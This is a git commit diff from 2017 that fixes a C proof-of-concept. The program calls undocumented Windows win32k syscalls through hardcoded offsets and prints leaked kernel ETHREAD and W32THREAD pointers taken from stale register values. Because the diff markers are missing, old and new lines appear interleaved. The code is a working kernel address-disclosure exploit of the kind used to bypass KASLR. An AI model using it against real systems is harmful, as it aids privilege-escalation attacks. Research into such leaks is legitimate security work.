fixed terrible coding mistake + new screenshots

This commit is contained in:
Sam Brown
2017-02-19 21:27:30 +00:00
parent 02772867ad
commit 0e358f9947
3 changed files with 19 additions and 16 deletions
+19 -16
View File
@@ -22,7 +22,7 @@
typedef DWORD(NTAPI * lNtUserModifyUserStartupInfoFlags)(DWORD Set, DWORD Flags);
typedef DWORD(NTAPI *lNtUserGetAsyncKeyState)(DWORD key);
typedef VOID(NTAPI * lNtGdiFONTOBJ_vGetInfo)(FONTOBJ *pfo,ULONG cjSize,FONTINFO *pfi);
typedef VOID(NTAPI * lNtGdiFONTOBJ_vGetInfo)(FONTOBJ *pfo, ULONG cjSize, FONTINFO *pfi);
typedef VOID(NTAPI * lNtGdiPATHOBJ_vEnumStartClipLines)(PATHOBJ *ppo, CLIPOBJ *pco, SURFOBJ *pso, LINEATTRS *pla);
extern "C" unsigned long long get_rax();
@@ -40,68 +40,71 @@ int main()
pNtUserGetAsyncKeyState(20);
#ifdef _WIN64
unsigned long long ethread = get_rax();
printf("NtUserGetAsyncKeyState ETHREAD partial disclosure: 0x%llx\r\n", ethread);
#else
unsigned int ethread = 0;
__asm {
mov ethread, eax;
}
#endif
printf("NtUserGetAsyncKeyState ETHREAD partial disclosure: 0x%X\r\n", ethread);
#endif
lNtUserModifyUserStartupInfoFlags pNtUserModifyUserStartupInfoFlags = (lNtUserModifyUserStartupInfoFlags)((DWORD_PTR)hUser32 + NtUserModifyUserStartupInfoFlagsAddress);
pNtUserModifyUserStartupInfoFlags(20, 12);
#ifdef _WIN64
unsigned long long ethread_full = get_rax();
printf("NtUserModifyUserStartupInfoFlags ETHREAD full disclosure: 0x%llx\r\n", ethread_full);
#else
unsigned ethread_full = 0;
__asm {
mov ethread_full, eax;
}
#endif
printf("NtUserModifyUserStartupInfoFlags ETHREAD full disclosure: 0x%X\r\n", ethread_full);
#endif
HMODULE hGDI32 = LoadLibraryA("gdi32.dll");
if (hGDI32 == NULL) {
printf("Failed to load gdi32");
return 1;
}
#ifdef _WIN64
//unsigned long long w32thread = get_rax();
#else
#ifndef _WIN64
lNtGdiFONTOBJ_vGetInfo pNtGdiFONTOBJ_vGetInfo = (lNtGdiFONTOBJ_vGetInfo)((DWORD_PTR)hGDI32 + NtGdiFONTOBJ_vGetInfoAddress);
FONTOBJ surf = { 0 };
FONTINFO finfo = { 0 };
pNtGdiFONTOBJ_vGetInfo(&surf,123, &finfo);
pNtGdiFONTOBJ_vGetInfo(&surf, 123, &finfo);
long int w32thread = 0;
__asm {
mov w32thread, eax;
}
printf("NtGdiEngUnLockSurface W32THREAD full disclosure: 0x%X\r\n", w32thread);
#endif
printf("NtGdiEngUnLockSurface W32THREAD full disclosure: 0x%X\r\n", ethread);
lNtGdiPATHOBJ_vEnumStartClipLines pNtGdiPATHOBJ_vEnumStartClipLines = (lNtGdiPATHOBJ_vEnumStartClipLines)((DWORD_PTR)hGDI32 + NtGdiPATHOBJ_vEnumStartClipLinesAddress);
PATHOBJ pathobj = { 0 };
CLIPOBJ pco = { 0 };
CLIPOBJ pco = { 0 };
SURFOBJ pso = { 0 };
LINEATTRS pla = { 0 };
pNtGdiPATHOBJ_vEnumStartClipLines(&pathobj, &pco, &pso, &pla);
#ifdef _WIN64
unsigned long long w32thread = get_rax();
printf("NtGdiPATHOBJ_vEnumStartClipLines W32THREAD full disclosure: 0x%llx\r\n", w32thread);
#else
w32thread = 0;
__asm {
mov w32thread, eax;
}
printf("NtGdiPATHOBJ_vEnumStartClipLines W32THREAD full disclosure: 0x%X\r\n", w32thread);
#endif
printf("NtGdiPATHOBJ_vEnumStartClipLines W32THREAD full disclosure: 0x%X\r\n", ethread);
return 0;
return 0;
}
Binary file not shown.

After

Width:  |  Height:  |  Size: 9.1 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 4.5 KiB